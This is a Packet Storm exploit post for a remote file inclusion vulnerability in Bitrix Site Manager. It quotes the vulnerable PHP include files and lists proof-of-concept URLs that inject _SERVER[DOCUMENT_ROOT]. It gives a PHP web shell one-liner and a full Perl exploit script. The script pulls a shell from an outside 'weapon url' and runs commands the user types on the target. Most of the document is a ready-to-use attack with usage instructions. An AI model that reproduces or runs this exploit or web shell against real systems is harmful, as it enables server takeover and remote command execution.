Bitrix Site Manager Remote File Inclusion

2009-11-18T00:00:00
ID PACKETSTORM:82715
Type packetstorm
Reporter Don Tukulesto
Modified 2009-11-18T00:00:00

Description

                                        
                                            `#####  
# [+] Author : Don Tukulesto (root@indonesiancoder.com)  
# [+] Date : November 13, 2009  
# [+] Homepage : http://www.indonesiancoder.com  
# [+] Vendor : http://www.bitrixsoft.com/  
# [+] Method : Remote File Inclusion  
# [+] Location : INDONESIA  
# [~] Notes : I know this is an old bug, but I just wrote this exploit as a Perl script.  
# [~] Reference : http://www.securityfocus.com/bid/13965  
# [~] How To :  
# perl tux.pl <target> <weapon url> cmd  
# perl tux.pl http://127.0.0.1/path/ http://www.indonesiancoder.org/shell.txt cmd  
# Weapon example: <?php system($_GET['cmd']); ?>  
#####  
# [-] Bugs in  
  
[+] rss.php  
<pre lang="php">  
<?  
require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/iblock/rss.php");  
?>   
</pre>  
  
[+] redirect.php  
<pre lang="php">  
<?  
define("GENERATE_EVENT","Y");  
require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");  
if (CModule::IncludeModule("statistic"))  
{  
$goto = eregi_replace("#EVENT_GID#",CStatEvent::GetGID(),$goto);  
}  
else  
{  
$goto = eregi_replace("#EVENT_GID#","",$goto);  
}  
LocalRedirect($goto);  
?>   
</pre>  
  
[+] click.php  
<pre lang="php">  
<?  
define("GENERATE_EVENT","Y");  
require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");  
if (intval($id)>0 and CModule::IncludeModule("advertising")) CAdvBanner::Click($id);  
if (CModule::IncludeModule("statistic")) $goto = str_replace("#EVENT_GID#",CStatEvent::GetGID(),$goto);  
LocalRedirect($goto);  
?>  
</pre>  
  
[+] admin/index.php  
<pre lang="php">  
<?  
require_once(dirname(__FILE__)."/../modules/main/include/prolog_admin_before.php");  
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/prolog_admin_after.php");  
?>  
<?  
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/interface/index.php");  
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_admin.php");  
?>  
</pre>  
  
[+] tools/help.php  
<pre lang="php">  
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/help.php");?>   
</pre>  
  
[+] tools/calendar.php  
<pre lang="php">  
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/calendar.php");?>   
</pre>  
  
[+] tools/ticket_show_file.php  
<pre lang="php">  
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/support/admin/ticket_show_file.php");?>   
</pre>  
  
[+] tools/imagepg.php  
<pre lang="php">  
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/imagepg.php");?>   
</pre>  
  
[+] tools/help_view.php  
<pre lang="php">  
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/help_view.php");?>   
</pre>  
  
[+] tools/help_create.php  
<pre lang="php">  
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/help_create.php");?>   
</pre>  
  
[-] PoC  
  
http://127.0.0.1/BX_ROOT/rss.php?_SERVER[DOCUMENT_ROOT]=  
http://127.0.0.1/BX_ROOT/click.php?_SERVER[DOCUMENT_ROOT]=  
http://127.0.0.1/BX_ROOT/redirect.php?_SERVER[DOCUMENT_ROOT]=  
http://127.0.0.1/BX_ROOT/admin/index.php?_SERVER[DOCUMENT_ROOT]=  
http://127.0.0.1/BX_ROOT/tools/help_create.php?_SERVER[DOCUMENT_ROOT]=  
http://127.0.0.1/BX_ROOT/tools/help_view.php?_SERVER[DOCUMENT_ROOT]=  
http://127.0.0.1/BX_ROOT/tools/imagepg.php?_SERVER[DOCUMENT_ROOT]=  
http://127.0.0.1/BX_ROOT/tools/ticket_show_file.php?_SERVER[DOCUMENT_ROOT]=  
http://127.0.0.1/BX_ROOT/tools/calendar.php?_SERVER[DOCUMENT_ROOT]=  
http://127.0.0.1/BX_ROOT/tools/help.php?_SERVER[DOCUMENT_ROOT]=  
  
[-] eXpL0!t c0des  
  
<pre lang="perl">  
#!/usr/bin/perl  
  
use HTTP::Request;  
use LWP::UserAgent;  
$RoNz = $ARGV[0];  
$Pathloader = $ARGV[1];  
$Contrex = $ARGV[2];  
if($RoNz!~/http:\/\// || $Pathloader!~/http:\/\// || !$Contrex){usage()}  
head();  
sub head()  
{  
print "[o]============================================================================[o]\r\n";  
print " | Bitrix Site Manager Multiple Remote File Include Vulnerability |\r\n";  
print "[o]============================================================================[o]\r\n";  
}  
while()  
{  
print "[w00t] \$";  
while(<STDIN>)  
{  
$kaMtiEz=$_;  
chomp($kaMtiEz);  
$arianom = LWP::UserAgent->new() or die;  
$tiw0L = HTTP::Request->new(GET =>$RoNz.'admin/index.php?_SERVER[DOCUMENT_ROOT]='.$Pathloader.'?&'.$Contrex.'='.$kaMtiEz)or die "\nCould Not connect\n";  
$abah_benu = $arianom->request($tiw0L);  
$tukulesto = $abah_benu->content;  
$tukulesto =~ tr/[\n]/[Í]/;  
if (!$kaMtiEz) {print "\nPlease Enter a Command\n\n"; $tukulesto ="";}  
elsif ($tukulesto =~/failed to open stream: HTTP request denied!/ || $tukulesto =~/: Cannot execute a blank command in /)  
{print "\nCann't Connect to cmd Host or Invalid Command\n";exit}  
elsif ($tukulesto =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}  
if($tukulesto =~ /(.*)/)  
{  
$finreturn = $1;  
$finreturn=~ tr/[Í]/[\n]/;  
print "\r\n$finreturn\n\r";  
last;  
}  
else {print "[w00t] \$";}}}last;  
sub usage()  
{  
head();  
print " | Usage: perl tux.pl <target> <weapon url> <cmd> |\r\n";  
print " | <Site> - Full path to execute ex: http://127.0.0.1/path/ |\r\n";  
print " | <Weapon url> - Path to Shell e.g http://www.indonesiancoder.org/shell.txt |\r\n";  
print " | <cmd> - Command variable used in php shell |\r\n";  
print "[o]============================================================================[o]\r\n";  
print " | IndonesianCoder Team | KILL-9 CREW | ServerIsDown | AntiSecurity.org |\r\n";  
print " | kaMtiEz, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, Gh4mb4S |\r\n";  
print " | M364TR0N, TUCKER, Ian Petrucii, kecemplungkalen, NoGe, bh4nd55, MainHack.Net |\r\n";  
print " | Jack-, Contrex, yadoy666, Ronz, noname, s4va, gonzhack, cyb3r_tron, saint |\r\n";  
print " | Awan Bejat, Plaque, rey_cute, BennyCooL, SurabayaHackerLink Team and YOU! |\r\n";  
print "[o]============================================================================[o]\r\n";  
print " | http://www.IndonesianCoder.org | http://www.AntiSecRadio.fm |\r\n";  
print "[o]============================================================================[o]\r\n";  
exit();  
}  
</pre>`